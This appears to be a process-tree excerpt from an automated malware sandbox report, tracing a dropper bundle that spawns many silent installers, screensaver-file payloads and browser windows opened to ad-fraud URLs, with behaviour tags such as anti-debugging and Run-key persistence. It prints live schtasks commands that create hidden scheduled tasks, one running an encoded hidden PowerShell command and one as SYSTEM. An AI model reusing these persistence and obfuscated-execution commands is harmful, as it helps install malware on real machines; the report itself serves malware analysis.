C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grzjpwdLi" /SC once /ST 04:10:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 23:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\HSUIAlc.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\1TNfF5svoOgPuV3Zb6nGOmzz.exe"C:\Users\Admin\Documents\1TNfF5svoOgPuV3Zb6nGOmzz.exe"8⤵
-
C:\Users\Admin\Documents\36D4KJuQIhW2OmfRkZ4eFWq7.exe"C:\Users\Admin\Documents\36D4KJuQIhW2OmfRkZ4eFWq7.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 17369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\Wud5sC2nC8mKLjpNoUGEzlnS.exe"C:\Users\Admin\Documents\Wud5sC2nC8mKLjpNoUGEzlnS.exe"8⤵
-
C:\Users\Admin\Documents\Wud5sC2nC8mKLjpNoUGEzlnS.exe"C:\Users\Admin\Documents\Wud5sC2nC8mKLjpNoUGEzlnS.exe"9⤵
-
C:\Users\Admin\Documents\bamF0gLctfDEX7DW5KJWOxvR.exe"C:\Users\Admin\Documents\bamF0gLctfDEX7DW5KJWOxvR.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PV6D7.tmp\bamF0gLctfDEX7DW5KJWOxvR.tmp"C:\Users\Admin\AppData\Local\Temp\is-PV6D7.tmp\bamF0gLctfDEX7DW5KJWOxvR.tmp" /SL5="$5051E,506127,422400,C:\Users\Admin\Documents\bamF0gLctfDEX7DW5KJWOxvR.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-LEOKA.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-LEOKA.tmp\Sharefolder.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Media Player\NPSQKTDYBJ\foldershare.exe"C:\Program Files\Windows Media Player\NPSQKTDYBJ\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\60-d8cc0-c05-de2ac-2daa8d735464b\Sylapiwozhu.exe"C:\Users\Admin\AppData\Local\Temp\60-d8cc0-c05-de2ac-2daa8d735464b\Sylapiwozhu.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471813⤵
-
C:\Users\Admin\AppData\Local\Temp\11-d2b70-cc3-62bb0-2957bc112c18f\Lishaenibyli.exe"C:\Users\Admin\AppData\Local\Temp\11-d2b70-cc3-62bb0-2957bc112c18f\Lishaenibyli.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mg1oxgxl.o50\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\mg1oxgxl.o50\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\mg1oxgxl.o50\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7216 -s 24014⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zgetn1ds.3wk\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\zgetn1ds.3wk\installer.exeC:\Users\Admin\AppData\Local\Temp\zgetn1ds.3wk\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2us1kblx.5ue\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\2us1kblx.5ue\any.exeC:\Users\Admin\AppData\Local\Temp\2us1kblx.5ue\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kd44hbvf.g4y\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\kd44hbvf.g4y\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\kd44hbvf.g4y\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 23614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wc1o5b5c.zje\autosubplayer.exe /S & exit12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\PZptpEMnIjoWnUNWlzwk2Xr6.exe"C:\Users\Admin\Documents\PZptpEMnIjoWnUNWlzwk2Xr6.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\XZcs_wYZWVkQtKrrFnZrkWh0.exe"C:\Users\Admin\Documents\XZcs_wYZWVkQtKrrFnZrkWh0.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\3975163.scr"C:\Users\Admin\AppData\Roaming\3975163.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\1977511.scr"C:\Users\Admin\AppData\Roaming\1977511.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8591180.scr"C:\Users\Admin\AppData\Roaming\8591180.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1603748.scr"C:\Users\Admin\AppData\Roaming\1603748.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8940848.scr"C:\Users\Admin\AppData\Roaming\8940848.scr" /S7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10b0a06a73706.exeFri10b0a06a73706.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7138906.scr"C:\Users\Admin\AppData\Roaming\7138906.scr" /S6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3963745.scr"C:\Users\Admin\AppData\Roaming\3963745.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6450217.scr"C:\Users\Admin\AppData\Roaming\6450217.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7375211.scr"C:\Users\Admin\AppData\Roaming\7375211.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6066875.scr"C:\Users\Admin\AppData\Roaming\6066875.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1015b9a4e0b.exeFri1015b9a4e0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 3006⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1008c7d6874.exeFri1008c7d6874.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1018ef4aa251c026c.exeFri1018ef4aa251c026c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10d184202996a0d7f.exeFri10d184202996a0d7f.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10720d229511df563.exeFri10720d229511df563.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri105268dda3.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri105268dda3.exeFri105268dda3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 2446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10acd1e0a9e6.exeFri10acd1e0a9e6.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 2446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10fcc13ae0125c8.exeFri10fcc13ae0125c8.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QQQBG.tmp\Fri10fcc13ae0125c8.tmp"C:\Users\Admin\AppData\Local\Temp\is-QQQBG.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$2016A,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10fcc13ae0125c8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-9P9FH.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-9P9FH.tmp\Sayma.exe" /S /UID=burnerch27⤵
- Executes dropped EXE
-
C:\Program Files\Uninstall Information\YRIZTBHDAO\ultramediaburner.exe"C:\Program Files\Uninstall Information\YRIZTBHDAO\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-FB92L.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-FB92L.tmp\ultramediaburner.tmp" /SL5="$502B8,281924,62464,C:\Program Files\Uninstall Information\YRIZTBHDAO\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\65-04a44-e60-202b2-925e8b7352be1\Kyfidyzheni.exe"C:\Users\Admin\AppData\Local\Temp\65-04a44-e60-202b2-925e8b7352be1\Kyfidyzheni.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5148 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1332 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1528 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5924 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:110⤵
-
